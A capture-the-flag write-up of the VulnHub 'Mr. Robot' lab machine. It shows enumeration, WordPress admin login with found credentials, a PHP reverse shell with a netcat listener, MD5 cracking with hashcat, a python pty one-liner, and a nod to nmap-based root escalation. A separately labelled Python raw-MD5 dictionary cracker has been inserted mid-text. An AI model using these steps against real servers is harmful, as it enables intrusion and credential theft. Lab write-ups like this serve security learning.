“Mr. Robot” VulnHub VM Writeup

Mr. Robot is a Linux-based vulnerable machine available on VulnHub.com. According to the author, the machine has three hidden flags which get progressively harder to find. Mr. Robot is considered beginner/intermediate level, and doesn’t require any advanced exploitation techniques to conquer.


The Mr. Robot VM is running on a host-only adapter/network of The machine is set up to pull an IP from DHCP when it boots. I know the DHCP range on this subnet is .200-.254, so I start with a simple nmap scan to discover the machine:

nmap -vv


Scanning [1000 ports]
Discovered open port 443/tcp on
Discovered open port 80/tcp on
Completed SYN Stealth Scan at 02:10, 4.97s elapsed (1000 total ports)
Nmap scan report for
Host is up, received arp-response (0.00077s latency).
Scanned at 2016-08-30 02:10:30 CDT for 6s
Not shown: 997 filtered ports
Reason: 997 no-responses
22/tcp  closed ssh     reset ttl 64
80/tcp  open   http    syn-ack ttl 64
443/tcp open   https   syn-ack ttl 64

Right away, we see the IP address of the machine is and that ports 80 and 443 are open. Navigating to in the browser, we find the interactive Mr. Robot website from the TV show, but nothing of real interest.

Now we’ll run DirBuster to try and enumerate the files/folders on the web-server:


And get a big list of results to look through:

---- Scanning URL:
+ (CODE:301|SIZE:0)
+ (CODE:302|SIZE:0)
+ (CODE:200|SIZE:0)
+ (CODE:200|SIZE:1077)
+ (CODE:301|SIZE:0)
+ (CODE:200|SIZE:516314)
+ (CODE:200|SIZE:309)
+ (CODE:302|SIZE:0)
+ (CODE:301|SIZE:0)
+ (CODE:403|SIZE:94)
+ (CODE:301|SIZE:0)
+ (CODE:200|SIZE:64)
+ (CODE:200|SIZE:41)
+ (CODE:200|SIZE:41)
+ (CODE:301|SIZE:0)
+ (CODE:301|SIZE:0)
+ (CODE:200|SIZE:0)
+ (CODE:200|SIZE:0)
+ (CODE:200|SIZE:0)
+ (CODE:200|SIZE:0)
+ (CODE:200|SIZE:227)
+ (CODE:200|SIZE:0)
+ (CODE:200|SIZE:2685)
+ (CODE:500|SIZE:3064)
+ (CODE:500|SIZE:0)
+ (CODE:302|SIZE:0)
+ (CODE:405|SIZE:42)
+ (CODE:405|SIZE:42)

We see that WordPress is installed. But before messing with that, it’s crucial that we go through every other file/folder and look for useful information. The first interesting file we find is NOTE: At first glance, this page just has one line of text taunting us. Make sure you look at the ENTIRE THING!

what you do just pull code from Rapid9 or some s@#% since when did you become a script kitty?


do you want a password or something?



At the very bottom of the file/page, we find what looks to be a base-64 encoded string. Let’s try decoding it in the terminal:

echo ZWxsaW90OkVSMjgtMDY1Mgo= | base64 -d
elliot:ER28-0652

Looks like we’ve found some credentials. Maybe they’re for WordPress? We’ll save these and finish up with our enumeration and looting of the web-server’s files and folders.


After continuing to look through the files and directories found by DirBuster, we make our way into the robots.txt file. In there, we find two very interesting files:

User-agent: *

The fsocity.dic file appears to be a wordlist that we’ll hang on to just in case we need it later. When we navigate to, we find the first of three flags:



With the first flag captured and the enumeration/looting of the webserver’s public files/directories complete, it’s time to take a look at the WordPress install. Using the elliot:ER28-0652 credentials we found earlier, we’re able to log into WordPress. It becomes immediately apparent that elliot is the administrator account:

Mr. Robot Vulnerable Machine - VulnHub

Now that we have access to the WordPress administrator account, we should be able to set up a reverse shell back to a listener on our attack machine. I used a PHP reverse shell from PentestMonkey and uploaded it to the server through WordPress’ built-in plugin installer. However, in hindsight, I also could have used WordPress’ built-in file editor to insert some malicious PHP into one of the many WordPress .php files.

Before executing the code on the server, let’s first set up a listener on our attack machine:

nc -lvp 666

Note: Make sure you set this to whatever port your shell is trying to connect back to. I used 666 in this example.

With a listener running, we can now use the browser to navigate to the location of our shell code( and hopefully get a shell on our attack machine:

PHP Reverse-shell on Mr. Robot Vulnerable Machine

With a shell established, let’s begin looking around. I tend to start in the home directory and in this instance we find a folder for a user named “robot”. Let’s cd into that folder and take a look if we can:

$ cd /home/robot/
$ ls -asl
total 16
4 drwxr-xr-x 2 root  root  4096 Nov 13  2015 .
4 drwxr-xr-x 3 root  root  4096 Nov 13  2015 ..
4 -r-------- 1 robot robot   33 Nov 13  2015 key-2-of-3.txt
4 -rw-r--r-- 1 robot robot   39 Nov 13  2015 password.raw-md5

We find the 2nd key file, but we can’t read it due to its permissions. However, there is a file named password.raw-md5 that we can read:

$ cat password.raw-md5

It looks to be the login and password hash for the user “robot”. Let’s place that hash in a text file on our attack machine named hashes, and then use hashcat and the rockyou.txt wordlist to try and crack it:

hashcat -a 0 -m 0 hashes rockyou.txt
Initializing hashcat v2.00 with 2 threads and 32mb segment-size...

Added hashes from file hashes: 1 (1 salts)
Activating quick-digest mode for single-hash

All hashes have been recovered

Input.Mode: Dict (rockyou.txt)
Index.....: 1/5 (segment), 3627099 (words), 33550343 (bytes)
Recovered.: 1/1 hashes, 1/1 salts
Speed/sec.: - plains, 2.77M words
Progress..: 1853946/3627099 (51.11%)
Running...: 00:00:00:01
Estimated.: --:--:--:--

So the password for user “robot” is abcdefghijklmnopqrstuvwxyz.
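As an added illustration that is not part of the original writeup, the following Python shows what `hashcat -a 0 -m 0` is doing with a raw, unsalted MD5 file like password.raw-md5: every candidate word is hashed once and compared against every digest in the file at the same time, which is exactly why unsalted fast hashes fall to a wordlist so quickly. The sample lines and the miniature wordlist are constructed; the robot digest is computed from the recovered password rather than copied from the VM, and the other users are hypothetical.

```python
import hashlib

# Constructed stand-in for /home/robot/password.raw-md5 ("user:hexdigest" lines).
# The robot digest is derived from the password the writeup recovered; the
# other two users are hypothetical, and "nobody" uses a word not in the list.
SAMPLE_LINES = [
    "robot:" + hashlib.md5(b"abcdefghijklmnopqrstuvwxyz").hexdigest(),
    "demo:" + hashlib.md5(b"letmein").hexdigest(),
    "nobody:" + hashlib.md5(b"correct-horse-battery-staple").hexdigest(),
]

# Constructed miniature stand-in for rockyou.txt.
SAMPLE_WORDLIST = ["123456", "password", "qwerty",
                   "abcdefghijklmnopqrstuvwxyz", "letmein"]


def parse_raw_md5_line(line):
    """Split a 'user:hexdigest' line and validate the digest (32 hex chars)."""
    user, _, digest = line.strip().partition(":")
    digest = digest.lower()
    if len(digest) != 32 or any(c not in "0123456789abcdef" for c in digest):
        raise ValueError("not a raw MD5 digest: %r" % digest)
    return user, digest


def crack_raw_md5(lines, wordlist):
    """Dictionary attack in the style of hashcat -a 0 -m 0, in miniature.

    Raw MD5 has no salt, so each word is hashed exactly once and the result
    is looked up against all digests at once. Returns {user: password} for
    every digest that matched; users whose password is not in the list are
    simply absent from the result.
    """
    targets = {}                      # digest -> [users sharing that digest]
    for line in lines:
        user, digest = parse_raw_md5_line(line)
        targets.setdefault(digest, []).append(user)

    recovered = {}
    for word in wordlist:
        digest = hashlib.md5(word.encode()).hexdigest()
        for user in targets.pop(digest, []):
            recovered[user] = word
        if not targets:               # everything cracked; stop early
            break
    return recovered


if __name__ == "__main__":
    for user, password in crack_raw_md5(SAMPLE_LINES, SAMPLE_WORDLIST).items():
        print("%s:%s" % (user, password))
```

With a per-user salt and a deliberately slow KDF (bcrypt, scrypt, Argon2), the single-hash-per-word shortcut above disappears and each guess must be recomputed per user, which is the property password.raw-md5 lacks.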


When attempting to log in as “robot” by using ‘su - robot’, I kept getting an error saying I could only execute this command from a terminal. I managed to get around this by borrowing the following command from g0tmi1k’s Basic Linux Privilege Escalation page:

python -c 'import pty;pty.spawn("/bin/bash")'

This then allowed me to log in as robot:

daemon@linux:/$ su - robot
Password: abcdefghijklmnopqrstuvwxyz

$ whoami

Now that we’re logged in as robot, we can finally read the 2nd flag file:

$ cat /home/robot/key-2-of-3.txt


Escalating privileges to root on Mr. Robot was definitely challenging for me. After doing all sorts of enumeration and searching for exploits on exploit-db/etc, I was stuck. I finally asked a friend who had recently completed Mr. Robot for help. He told me that nmap was installed on the VM, and that I should look into that. After some Google searching, I learned that nmap’s interactive mode could be used to escalate privileges in certain scenarios.

From there, it was smooth sailing and I managed to quickly get root privileges and read the third and final flag file:

Getting root on Mr. Robot Vulnerable Machine


This was a fun machine overall and taught me a few things:

First: How easily an Admin account on WordPress can be leveraged to get a shell on a server.

Second: How important enumeration is to privilege escalation. Even though I thought I had looked at everything, I had missed a relatively simple escalation vulnerability.

Enumerate, enumerate, enumerate…And then Google everything you find.

E-Mail Me | Twitter @NetSecDave